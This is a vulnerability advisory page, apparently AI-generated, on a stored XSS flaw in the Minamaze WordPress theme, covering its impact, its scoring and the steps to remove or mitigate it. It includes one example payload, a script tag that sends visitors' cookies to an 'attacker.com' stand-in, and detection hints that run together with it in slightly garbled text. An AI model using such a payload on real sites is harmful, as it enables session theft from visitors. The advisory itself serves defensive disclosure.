
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-62991 is a Stored Cross-Site Scripting (XSS) vulnerability in the ThinkUpThemes Minamaze WordPress theme, classified under CWE-79. It affects Minamaze versions up to and including 1.11.2 (initially reported as ≤ 1.10.1). The vulnerability was discovered by researcher Peter Thaleikis, reported on October 23, 2025, and published by Patchstack on December 31, 2025. It carries a CVSS v3.1 base score of 6.5 (Medium) (Patchstack, Red Hat CVE).
The vulnerability stems from improper neutralization of user-supplied input during web page generation (CWE-79), allowing authenticated users with at least Contributor or Developer-level privileges to inject and persistently store malicious scripts within the theme. Because the scope is changed (S:C in the CVSS vector), the injected payload executes in the context of other users' browsers rather than the attacker's own session. User interaction is required for exploitation — a privileged user must perform an action such as visiting a crafted page or submitting content. No public proof-of-concept exploit code has been identified at this time (Patchstack).
Successful exploitation allows an authenticated attacker to inject persistent malicious JavaScript into pages rendered by the Minamaze theme, which executes in the browsers of site visitors. This can lead to session cookie theft, credential harvesting, unauthorized redirects, defacement, or delivery of malicious payloads to site visitors. Confidentiality, integrity, and availability are each assessed as low impact, but the changed scope means the attack can affect users beyond the attacker's own privilege boundary (Patchstack, Red Hat CVE).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>./wp-admin/customize.php, post/page editors) from unexpected or low-privilege accounts.<script> tags embedded in WordPress post content, theme options, or widget data stored in the database.wp_posts, wp_options, or wp_postmeta tables associated with Minamaze theme settings.As of the disclosure date, no official patch from ThinkUpThemes is available — Patchstack notes the theme is unlikely to receive further updates. The recommended remediation is to remove and replace the Minamaze theme with an actively maintained alternative. Sites using Patchstack can deploy a virtual patching/mitigation rule to block exploitation without removing the theme. If removal is not immediately possible, restrict Contributor and Developer role assignments to trusted users only to reduce the attack surface (Patchstack).
The vulnerability was covered in Sucuri's January 2026 vulnerability patch roundup, indicating moderate industry awareness. Automated CVE tracking accounts on Bluesky and aggregators such as Vulners, VulDB, and CIRCL's vulnerability lookup service indexed the issue shortly after disclosure. No significant vendor statements or notable researcher commentary beyond the initial Patchstack disclosure have been identified.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."